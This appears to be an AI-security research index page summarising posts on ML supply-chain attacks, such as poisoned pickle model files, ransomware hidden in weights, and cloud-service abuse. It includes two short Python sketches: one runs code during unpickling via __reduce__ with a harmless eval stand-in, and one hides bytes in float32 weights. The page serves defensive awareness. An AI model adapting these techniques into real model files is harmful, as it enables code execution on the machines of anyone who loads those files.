Research


Machine Learning Operations: What You Need to Know Now

HiddenLayer researchers discovered six zero-day vulnerabilities in ClearML that, chained together, enable complete system compromise.


The Use and Abuse of AI Cloud Services

AI cloud services are being hijacked for cryptomining, password cracking, and hosting malicious phishing bots.


Machine Learning Models are Code

Researchers uncovered critical code execution flaws in TensorFlow and Keras models via Lambda layers and I/O operations.


The Dark Side of Large Language Models Part 2

The Feedback Loop: The rapid proliferation of AI-generated content online creates a "Dead Internet" risk, where future models are trained on low-quality AI data, leading to a permanent degradation of information quality.


The Dark Side of Large Language Models Part 1

Malware on the Fly: Attackers now use LLM APIs to synthesize polymorphic malware. In these scenarios, the malicious code (like a keylogger) is generated uniquely each time it executes, making it nearly invisible to traditional signature-based antivirus.


Machine Learning Threat Roundup

Modern ML models (such as those saved with PyTorch) typically contain a data.pkl file. This pickle is meant to reconstruct the network's weights at load time, but it can be "poisoned" to execute malicious system calls during deserialization.
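A minimal sketch (not taken from the post) of why loading an untrusted pickle is dangerous: pickle's `__reduce__` hook lets an object name any callable to be invoked at load time, so "deserializing weights" can silently run attacker-chosen code. The `Malicious` class below is a hypothetical payload for illustration.

```python
import pickle


class Malicious:
    # __reduce__ tells pickle how to "reconstruct" the object on load;
    # an attacker returns (callable, args), which pickle.loads() executes.
    # A real payload would call os.system or similar; eval("6 * 7") is a
    # harmless stand-in that proves arbitrary code ran.
    def __reduce__(self):
        return (eval, ("6 * 7",))


payload = pickle.dumps(Malicious())

# The victim only needs to *load* the file for the code to run:
result = pickle.loads(payload)
print(result)  # 42 — eval() executed during unpickling
```

Note that the loading side never needs the `Malicious` class at all: the pickle stream stores only the callable and its arguments, which is what makes a model file such an effective carrier.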


Supply Chain Threats: Critical Look at Your ML Ops Pipeline

ML supply chain attacks leverage data poisoning and hijacked models to steal data and compromise cloud environments.


Pickle Files: The New ML Model Attack Vector

Adversaries are weaponizing Python's pickle format to hide Cobalt Strike and Mythic C2 agents in machine learning models.


Weaponizing ML Models with Ransomware

Machine learning models can hide ransomware in their weights using steganography and execute it via insecure pickle deserialization.
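As a rough illustration of the steganographic half of that idea (a simplified sketch under assumptions of my own, not the technique from the post): each float32 weight has a low-order mantissa byte that can carry one payload byte with negligible effect on the weight's value. The weight list and the `b"EVIL!"` payload below are hypothetical.

```python
import struct

# Hypothetical toy weights; a real model would have millions of these.
weights = [0.5, 0.25, 0.125, 1.0, 2.0]
payload = b"EVIL!"  # one payload byte per weight


def embed(w: float, byte: int) -> float:
    """Overwrite the least-significant mantissa byte of a float32 weight."""
    raw = bytearray(struct.pack("<f", w))  # little-endian: raw[0] is the LSB
    raw[0] = byte
    return struct.unpack("<f", bytes(raw))[0]


# Embed the payload; each weight shifts by far less than typical model noise.
stego = [embed(w, b) for w, b in zip(weights, payload)]

# Extraction is just reading those bytes back out of the "weights".
recovered = bytes(struct.pack("<f", w)[0] for w in stego)
print(recovered)  # b'EVIL!'
```

The numeric perturbation per weight is on the order of a few ulps, which is why a model carrying an embedded payload can still score normally; the pickle-deserialization flaw then provides the execution step.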


Machine Learning is the New Launchpad for Ransomware

AI models can be weaponized with hidden ransomware, exploiting insecure serialization to bypass traditional security.


Unpacking the AI Adversarial Toolkit

The Rise of Autonomy: Tools have evolved from static libraries to Autonomous Pentesting Agents (e.g., Penligent, XBOW) that use "Chain-of-Thought" reasoning to execute end-to-end attack chains without human intervention.


Analyzing Threats to Artificial Intelligence: A Book Review

Dan Klinedinst discusses AI security frameworks, shifting threat landscapes, and the vital role of proactive threat modeling.

Understand AI Security, Clearly Defined

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.